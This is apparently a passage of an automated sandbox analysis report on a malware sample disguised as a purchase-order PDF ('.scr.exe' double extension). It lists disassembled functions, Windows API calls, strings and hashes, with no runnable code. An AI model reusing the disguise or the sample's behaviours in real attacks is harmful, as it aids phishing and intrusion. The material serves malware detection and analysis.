                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                                                                                                                                                                                                            Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                                                                                                                                                            • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                                                                                                                                                                                                            Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                            • String ID: 0%d$DOWN$OFF
                                                                                                                                                                                                                                                                                                            • API String ID: 3832890014-468733193
                                                                                                                                                                                                                                                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                                                                                                                                                                                                            Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                                                                                                                                                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                                                                                                                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                                                                                                                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                            • API String ID: 43541914-1568723262
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6a1a02ce3b022fb34617779b0441390f086caefb454479838db7f293f5ca1c44
                                                                                                                                                                                                                                                                                                            • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a1a02ce3b022fb34617779b0441390f086caefb454479838db7f293f5ca1c44
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                                                                                                                                                                                                            Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                            • API String ID: 0-1603158881
                                                                                                                                                                                                                                                                                                            • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                                                                                                                                                                                            Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00479D1F
                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                                                                                                                                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                            • API String ID: 665237470-60002521
                                                                                                                                                                                                                                                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                                                                                                                                                                                            Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                                                                                                                                                                                                            Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0045F317
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                                            • API String ID: 3311875123-3793063076
                                                                                                                                                                                                                                                                                                            • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                                                                                                                                                                                            Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe), ref: 0043719E
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 004371EC
                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, xrefs: 00437189
                                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                            • API String ID: 220974073-1901747113
                                                                                                                                                                                                                                                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                                                                                                                                                                                            Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
